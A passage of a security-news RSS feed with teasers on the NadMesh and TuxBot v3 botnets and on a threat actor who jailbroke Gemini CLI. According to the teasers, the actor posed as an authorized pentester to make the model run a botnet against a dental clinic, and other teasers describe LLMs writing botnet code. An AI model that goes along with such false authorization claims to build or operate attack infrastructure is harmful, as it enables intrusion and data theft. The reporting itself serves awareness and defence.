<content:encoded><![CDATA[<p>Discovered in early July 2026, NadMesh identifies itself in code as “n4d mesh controller” and operates as a long‑lived, iteratively developed botnet rather than a one‑off worm outbreak. It is written in Go and integrates Scanning, exploitation, credential theft, and AI/MCP service intelligence collection into a single mesh‑style infrastructure centered on attacker‑controlled VPS nodes. The […]</p>
<p>The post <a href="https://cyberpress.org/nadmesh-targets-ai-servers/">NadMesh Botnet Targets AI and MCP Servers With 20+ Remote Code Execution Vectors</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian hacker turns Gemini CLI into a hacking agent, creates small-scale botnet]]></title>
<description><![CDATA[The hacker told the AI he was an authorized pentester - and the AI believed him.]]></description>
<link>https://tsecurity.de/de/3674037/it-nachrichten/russian-hacker-turns-gemini-cli-into-a-hacking-agent-creates-small-scale-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674037/it-nachrichten/russian-hacker-turns-gemini-cli-into-a-hacking-agent-creates-small-scale-botnet/</guid>
<pubDate>Thu, 16 Jul 2026 18:18:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The hacker told the AI he was an authorized pentester - and the AI believed him.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-16 15h : 16 posts]]></title>
<description><![CDATA[16 posts were published in the last hour 12:34 : Inside Microsoft’s Record-Breaking 622-Bug Release 12:34 : Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes 12:34 : Daxin Resurfaces in Taiwan Alongside Stupig Pre-Login SYSTEM…
Read more →
The post I...]]></description>
<link>https://tsecurity.de/de/3673552/it-security-nachrichten/it-security-news-hourly-summary-2026-07-16-15h-16-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673552/it-security-nachrichten/it-security-news-hourly-summary-2026-07-16-15h-16-posts/</guid>
<pubDate>Thu, 16 Jul 2026 15:09:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>16 posts were published in the last hour 12:34 : Inside Microsoft’s Record-Breaking 622-Bug Release 12:34 : Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes 12:34 : Daxin Resurfaces in Taiwan Alongside Stupig Pre-Login SYSTEM…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-16-15h-16-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-16-15h-16-posts/">IT Security News Hourly Summary 2026-07-16 15h : 16 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March…
Re...]]></description>
<link>https://tsecurity.de/de/3673506/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673506/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</guid>
<pubDate>Thu, 16 Jul 2026 14:53:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/">Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3: The IoT Botnet Built With AI – Bugs, Disclaimers and All]]></title>
<description><![CDATA[TuxBot v3, an AI-built IoT botnet for 17 architectures, shipped with LLM bugs and safety disclaimers the developer never removed. Palo Alto Networks’ Unit 42 identified a previously undocumented modular IoT botnet framework called TuxBot v3 Evolution, and it comes…
Read more →
The post TuxBot v3:...]]></description>
<link>https://tsecurity.de/de/3673413/it-security-nachrichten/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673413/it-security-nachrichten/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TuxBot v3, an AI-built IoT botnet for 17 architectures, shipped with LLM bugs and safety disclaimers the developer never removed. Palo Alto Networks’ Unit 42 identified a previously undocumented modular IoT botnet framework called TuxBot v3 Evolution, and it comes…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/">TuxBot v3: The IoT Botnet Built With AI – Bugs, Disclaimers and All</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March 19 ...]]></description>
<link>https://tsecurity.de/de/3673407/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673407/it-security-nachrichten/russian-cybercriminal-used-jailbroken-gemini-cli-to-rebuild-botnet-infrastructure-in-six-minutes/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor known as “bandcampro” used a jailbroken Gemini CLI, Google’s open-source terminal-based AI agent, to deploy and operate a small command-and-control (C2) botnet, according to TrendAI. Operational overview (Source: TrendAI) In more than 200 sessions between March 19 and April 21, 2026, the threat actor worked with Gemini to deploy and operate infrastructure that controlled eight computers inside a dental clinic and gain access to the clinic’s OpenDental database. Posing as an … <a href="https://www.helpnetsecurity.com/2026/07/16/jailbroken-google-gemini-cli-botnet/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/jailbroken-google-gemini-cli-botnet/">Russian cybercriminal used jailbroken Gemini CLI to rebuild botnet infrastructure in six minutes</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3: The IoT Botnet Built With AI – Bugs, Disclaimers and All]]></title>
<description><![CDATA[TuxBot v3, an AI-built IoT botnet for 17 architectures, shipped with LLM bugs and safety disclaimers the developer never removed. Palo Alto Networks’ Unit 42 identified a previously undocumented modular IoT botnet framework called TuxBot v3 Evolution, and it comes with an unusual detail: the deve...]]></description>
<link>https://tsecurity.de/de/3673288/it-security-nachrichten/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673288/it-security-nachrichten/tuxbot-v3-the-iot-botnet-built-with-ai-bugs-disclaimers-and-all/</guid>
<pubDate>Thu, 16 Jul 2026 13:40:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[TuxBot v3, an AI-built IoT botnet for 17 architectures, shipped with LLM bugs and safety disclaimers the developer never removed. Palo Alto Networks’ Unit 42 identified a previously undocumented modular IoT botnet framework called TuxBot v3 Evolution, and it comes with an unusual detail: the developer used a large language model to write significant portions […]]]></content:encoded>
</item>
<item>
<title><![CDATA[New TuxBot v3 IoT Botnet Uses LLM-Generated Code to Hijack Devices and Launch DDoS Attacks]]></title>
<description><![CDATA[A newly identified IoT botnet framework, TuxBot v3 Evolution, is targeting internet-connected devices and turning compromised systems into tools for distributed denial-of-service attacks. The malware can run across a wide range of device architectures, creating a broad risk for routers,…
Read mor...]]></description>
<link>https://tsecurity.de/de/3672933/it-security-nachrichten/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672933/it-security-nachrichten/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/</guid>
<pubDate>Thu, 16 Jul 2026 11:23:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly identified IoT botnet framework, TuxBot v3 Evolution, is targeting internet-connected devices and turning compromised systems into tools for distributed denial-of-service attacks. The malware can run across a wide range of device architectures, creating a broad risk for routers,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/">New TuxBot v3 IoT Botnet Uses LLM-Generated Code to Hijack Devices and Launch DDoS Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New TuxBot v3 IoT Botnet Uses LLM-Generated Code to Hijack Devices and Launch DDoS Attacks]]></title>
<description><![CDATA[A newly identified IoT botnet framework, TuxBot v3 Evolution, is targeting internet-connected devices and turning compromised systems into tools for distributed denial-of-service attacks. The malware can run across a wide range of device architectures, creating a broad risk for routers, cameras, ...]]></description>
<link>https://tsecurity.de/de/3672807/it-security-nachrichten/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672807/it-security-nachrichten/new-tuxbot-v3-iot-botnet-uses-llm-generated-code-to-hijack-devices-and-launch-ddos-attacks/</guid>
<pubDate>Thu, 16 Jul 2026 10:39:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly identified IoT botnet framework, TuxBot v3 Evolution, is targeting internet-connected devices and turning compromised systems into tools for distributed denial-of-service attacks. The malware can run across a wide range of device architectures, creating a broad risk for routers, cameras, and other exposed Linux-based equipment. TuxBot uses several paths to gain access, including Telnet […]</p>
<p>The post <a href="https://cybersecuritynews.com/new-tuxbot-v3-iot-botnet-uses-llm-generated-code/">New TuxBot v3 IoT Botnet Uses LLM-Generated Code to Hijack Devices and Launch DDoS Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New IoT Botnet Uses 1,496 Default Passwords and Seven Persistence Mechanisms]]></title>
<description><![CDATA[Security researchers have uncovered TuxBot v3 Evolution, a modular IoT botnet framework built to compromise internet-exposed devices, maintain long-term access, and launch distributed denial-of-service (DDoS) attacks. The malware targets a broad range of Linux-based systems and uses Telnet creden...]]></description>
<link>https://tsecurity.de/de/3672616/it-security-nachrichten/new-iot-botnet-uses-1496-default-passwords-and-seven-persistence-mechanisms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672616/it-security-nachrichten/new-iot-botnet-uses-1496-default-passwords-and-seven-persistence-mechanisms/</guid>
<pubDate>Thu, 16 Jul 2026 09:24:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have uncovered TuxBot v3 Evolution, a modular IoT botnet framework built to compromise internet-exposed devices, maintain long-term access, and launch distributed denial-of-service (DDoS) attacks. The malware targets a broad range of Linux-based systems and uses Telnet credential brute forcing, scanning modules, encrypted command-and-control (C2), and multiple resilience features The botnet carries 1,496 username-and-password […]</p>
<p>The post <a href="https://cyberpress.org/botnet-exploits-default-passwords/">New IoT Botnet Uses 1,496 Default Passwords and Seven Persistence Mechanisms</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LLM-Assisted TuxBot Botnet Targets IoT Devices Across 17 Processor Architectures]]></title>
<description><![CDATA[TuxBot v3 Evolution, a modular IoT botnet framework capable of infecting devices running architectures ranging from ARM and MIPS to x86_64, PowerPC and RISC-V. The platform appears designed for mass compromise, persistence and distributed denial-of-service operations, with a C-based bot…
Read mor...]]></description>
<link>https://tsecurity.de/de/3672551/it-security-nachrichten/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672551/it-security-nachrichten/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/</guid>
<pubDate>Thu, 16 Jul 2026 08:37:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TuxBot v3 Evolution, a modular IoT botnet framework capable of infecting devices running architectures ranging from ARM and MIPS to x86_64, PowerPC and RISC-V. The platform appears designed for mass compromise, persistence and distributed denial-of-service operations, with a C-based bot…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/">LLM-Assisted TuxBot Botnet Targets IoT Devices Across 17 Processor Architectures</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LLM-Assisted TuxBot Botnet Targets IoT Devices Across 17 Processor Architectures]]></title>
<description><![CDATA[TuxBot v3 Evolution, a modular IoT botnet framework capable of infecting devices running architectures ranging from ARM and MIPS to x86_64, PowerPC and RISC-V. The platform appears designed for mass compromise, persistence and distributed denial-of-service operations, with a C-based bot agent and...]]></description>
<link>https://tsecurity.de/de/3672521/it-security-nachrichten/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672521/it-security-nachrichten/llm-assisted-tuxbot-botnet-targets-iot-devices-across-17-processor-architectures/</guid>
<pubDate>Thu, 16 Jul 2026 08:23:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TuxBot v3 Evolution, a modular IoT botnet framework capable of infecting devices running architectures ranging from ARM and MIPS to x86_64, PowerPC and RISC-V. The platform appears designed for mass compromise, persistence and distributed denial-of-service operations, with a C-based bot agent and a Go-based command-and-control server. Palo Alto Networks Unit 42 said it recovered the […]</p>
<p>The post <a href="https://gbhackers.com/llm-assisted-tuxbot-botnet/">LLM-Assisted TuxBot Botnet Targets IoT Devices Across 17 Processor Architectures</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7/15/2026]]></title>
<description><![CDATA[Alleged Russian Cyber Spy in Boston Case Previously Worked for Kaspersky Compromised Logins Surge as the Most Common Entry Point for Ransomware AttacksWhite House Details ‘Gold Eagle’ Clearinghouse for AI Cyber ThreatsIs ‘Tech-xit’ Imminent? UK Steps Up Sovereignty Push Amid AI StrifeTuxBot v3 Ev...]]></description>
<link>https://tsecurity.de/de/3672053/it-security-nachrichten/7152026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672053/it-security-nachrichten/7152026/</guid>
<pubDate>Thu, 16 Jul 2026 01:08:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Alleged Russian Cyber Spy in Boston Case Previously Worked for Kaspersky Compromised Logins Surge as the Most Common Entry Point for Ransomware AttacksWhite House Details ‘Gold Eagle’ Clearinghouse for AI Cyber ThreatsIs ‘Tech-xit’ Imminent? UK Steps Up Sovereignty Push Amid AI StrifeTuxBot v3 Evolution Shows Signs of LLM-Assisted IoT Botnet Development Google Gemini CLI Abused … <a href="https://thecyberbeat.com/2026/07/15/7-15-2026/" class="more-link">Continue reading <span class="screen-reader-text">7/15/2026</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top AI tools such as OpenClaw and Github Copilot can be hijacked to create new massive botnets]]></title>
<description><![CDATA[Researchers find nine of the most popular AI platforms are susceptible to a new attack that exploits hallucinations to set up a botnet.]]></description>
<link>https://tsecurity.de/de/3671788/it-nachrichten/top-ai-tools-such-as-openclaw-and-github-copilot-can-be-hijacked-to-create-new-massive-botnets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671788/it-nachrichten/top-ai-tools-such-as-openclaw-and-github-copilot-can-be-hijacked-to-create-new-massive-botnets/</guid>
<pubDate>Wed, 15 Jul 2026 22:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researchers find nine of the most popular AI platforms are susceptible to a new attack that exploits hallucinations to set up a botnet.]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3 Evolution: Hinweis auf LLM-unterstützte IoT-Botnet-Entwicklung]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Sicherheitsforscher beschreiben ein zuvor nicht dokumentiertes IoT-Botnet-Framework namens TuxBot v3 Evolution, das offenbar mit Unterstützung durch ein LLM entstanden ist. In den analysierten Artefakten liefert die KI zwar Botnet-Code, aber mit übersehenen Sicherheits- und...]]></description>
<link>https://tsecurity.de/de/3671738/it-security-nachrichten/tuxbot-v3-evolution-hinweis-auf-llm-unterstuetzte-iot-botnet-entwicklung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671738/it-security-nachrichten/tuxbot-v3-evolution-hinweis-auf-llm-unterstuetzte-iot-botnet-entwicklung/</guid>
<pubDate>Wed, 15 Jul 2026 21:36:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tuxbot-v3-evolution-iot-botnet-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Sicherheitsforscher beschreiben ein zuvor nicht dokumentiertes IoT-Botnet-Framework namens TuxBot v3 Evolution, das offenbar mit Unterstützung durch ein LLM entstanden ist. In den analysierten Artefakten liefert die KI zwar Botnet-Code, aber mit übersehenen Sicherheits- und Funktionsdetails: Mehrere Implementierungsstellen sollen nicht zuverlässig arbeiten. Auffällig sind die modularen Komponenten, darunter ein Go-basiertes Command-and-Control-System, ein […]</p>
<div><a href="https://www.it-boltwise.de/tuxbot-v3-evolution-hinweis-auf-llm-unterstuetzte-iot-botnet-entwicklung.html">... den vollständigen Artikel <strong>»TuxBot v3 Evolution: Hinweis auf LLM-unterstützte IoT-Botnet-Entwicklung«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/tuxbot-v3-evolution-hinweis-auf-llm-unterstuetzte-iot-botnet-entwicklung.html">TuxBot v3 Evolution: Hinweis auf LLM-unterstützte IoT-Botnet-Entwicklung</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3 Evolution Shows Signs of LLM-Assisted IoT Botnet Development]]></title>
<description><![CDATA[Cybersecurity researchers have disclosed details of a previously unreported Internet-of-Things (IoT) botnet framework dubbed TuxBot v3 Evolution that shows signs of being developed with assistance from a large language model (LLM), albeit with not so successful results.

"While the AI complied wi...]]></description>
<link>https://tsecurity.de/de/3671692/it-security-nachrichten/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671692/it-security-nachrichten/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have disclosed details of a previously unreported Internet-of-Things (IoT) botnet framework dubbed TuxBot v3 Evolution that shows signs of being developed with assistance from a large language model (LLM), albeit with not so successful results.

"While the AI complied with their request to generate botnet code, it included a safety disclaimer that the developer failed]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3 Evolution Shows Signs of LLM-Assisted IoT Botnet Development]]></title>
<description><![CDATA[Cybersecurity researchers have disclosed details of a previously unreported Internet-of-Things (IoT) botnet framework dubbed TuxBot v3 Evolution that shows signs of being developed with assistance from a large language model (LLM), albeit with not so successful results. “While the AI…
Read more →...]]></description>
<link>https://tsecurity.de/de/3671689/it-security-nachrichten/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671689/it-security-nachrichten/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have disclosed details of a previously unreported Internet-of-Things (IoT) botnet framework dubbed TuxBot v3 Evolution that shows signs of being developed with assistance from a large language model (LLM), albeit with not so successful results. “While the AI…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/tuxbot-v3-evolution-shows-signs-of-llm-assisted-iot-botnet-development/">TuxBot v3 Evolution Shows Signs of LLM-Assisted IoT Botnet Development</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Gemini CLI abused as a hacking agent, malware botnet operator]]></title>
<description><![CDATA[A Russian-speaking threat actor known as "bandcampro" used Google's open-source Gemini CLI AI tool as a hacking agent and to operate a small-scale botnet. [...]]]></description>
<link>https://tsecurity.de/de/3671627/it-security-nachrichten/google-gemini-cli-abused-as-a-hacking-agent-malware-botnet-operator/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671627/it-security-nachrichten/google-gemini-cli-abused-as-a-hacking-agent-malware-botnet-operator/</guid>
<pubDate>Wed, 15 Jul 2026 20:37:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Russian-speaking threat actor known as "bandcampro" used Google's open-source Gemini CLI AI tool as a hacking agent and to operate a small-scale botnet. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Smart TV Could Be Working for Hackers | Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 69x - Views:439 ⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️


@endingwithali →
Twitch: https://twitch.tv/endingwithali
Twitter: https://twitter.com/endingwithali
YouTube: https://youtube.com/@endingwithali
Everywhere else: https://links.ali.dev

Want to work with Ali?...]]></description>
<link>https://tsecurity.de/de/3671382/it-security-video/your-smart-tv-could-be-working-for-hackers-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671382/it-security-video/your-smart-tv-could-be-working-for-hackers-threat-wire/</guid>
<pubDate>Wed, 15 Jul 2026 18:35:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 69x - Views:439 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/j_rKXznEMvE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
0:00 0 - Intro<br />
1 - Your Local Botnet<br />
2 - Charging For Internet<br />
3 - Scattered Spider<br />
4 - BSides News<br />
5 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: Your Local Botnet<br />
https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks<br />
https://www.bleepingcomputer.com/news/security/netnut-proxy-network-disrupted-2-million-infected-devices-cut-off/<br />
https://thehackernews.com/2026/07/google-disrupts-netnut-residential.html<br />
🔗 Story 2: Charging For Internet<br />
https://blog.cloudflare.com/monetization-gateway/<br />
https://blog.cloudflare.com/introducing-pay-per-crawl/<br />
🔗 Story 3: Scattered Spider<br />
https://www.helpnetsecurity.com/2026/07/02/scattered-spider-criminal-group-suspect-extradited/<br />
https://www.bleepingcomputer.com/news/security/alleged-scattered-spider-hacker-extradited-to-the-united-states/<br />
https://thehackernews.com/2026/07/19-year-old-scattered-spider-suspect.html<br />
🔗 Story 4: BSides News<br />
https://cybersecuritynews.com/pamstealer-mimic-as-maccy-harvest/<br />
https://arstechnica.com/security/2026/07/new-pamstealer-macos-malware-uses-clever-tradecraft-to-remain-stealthy/<br />
https://thehackernews.com/2026/06/rustduck-botnet-rebuilds-in-rust-to.html<br />
https://openai.com/index/previewing-gpt-5-6-sol/<br />
https://arstechnica.com/information-technology/2026/06/us-offers-10-million-for-info-on-group-behind-signal-and-whatsapp-hacking-spree/<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code]]></title>
<description><![CDATA[submitted by    /u/asherdl02   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3671091/malware-trojaner-viren/tuxbot-v3-evolution-an-iot-botnet-as-a-service-framework-built-with-llm-generated-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671091/malware-trojaner-viren/tuxbot-v3-evolution-an-iot-botnet-as-a-service-framework-built-with-llm-generated-code/</guid>
<pubDate>Wed, 15 Jul 2026 17:02:22 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/asherdl02"> /u/asherdl02 </a> <br> <span><a href="https://www.reddit.com/r/Malware/comments/1ux7nmo/tuxbot_v3_evolution_an_iot_botnetasaservice/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1ux7o82/tuxbot_v3_evolution_an_iot_botnetasaservice/">[comments]</a></span>]]></content:encoded>
</item>
<item>
